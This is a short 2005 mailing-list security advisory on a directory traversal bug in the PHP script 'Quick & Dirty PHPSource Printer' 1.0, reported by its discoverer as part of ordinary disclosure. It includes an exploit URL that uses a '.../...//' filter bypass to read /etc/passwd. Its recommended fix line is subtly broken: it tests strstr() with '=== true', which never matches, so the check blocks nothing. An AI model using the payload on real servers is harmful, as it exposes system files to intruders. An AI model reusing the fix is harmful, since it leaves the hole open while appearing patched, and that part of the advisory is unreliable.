[Full-disclosure] Directory traversal vulnerability in "Quick & Dirty PHPSource Printer" 1.0

Type securityvulns
Reporter Securityvulns
Modified 2005-07-04T00:00:00


== Vendor: Kaf Oseo

== Product: http://guff.szub.net/quick-dirty-phpsource-printer/

== Version: 1.0

== Vulnerability: Filtering "../" to "" allowed use of ".../...//" to be inserted and changed to "../" allowing directory traversal.

== Fix: Use the following line instead: $file = (strstr($file_get, '../') === true) ? '' : $file_get; // protect from site traversing

== Discoverer: Seth Alan Woolley

== Discovery Date: 2005-07-03

== Patch Date: 2005-07-03

== Notification Date: 2005-07-03

== Disclosure Date: 2005-07-03

== Exploit: http://sample.domain.com/source.php?file=.../...//.../...//.../...//.../...//.../...//.../...//etc/passwd

== Greets shellsage, #wordpress

== Commentary Free/Open Source Software ... written better because anybody could be looking at it and people who care about security more than their next paycheck did look at it.

-- Seth Alan Woolley [seth at positivism.org], SPAM/UCE is unauthorized Quality Assurance Team Leader & Security Team: Source Mage GNU/linux Linux so advanced, it may as well be magic http://www.sourcemage.org Secretary Pacific Green Party of Oregon http://www.pacificgreens.org Key id 00BA3AF3 = 8BE0 A72E A47E A92A 0737 F2FF 7A3F 6D3C 00BA 3AF3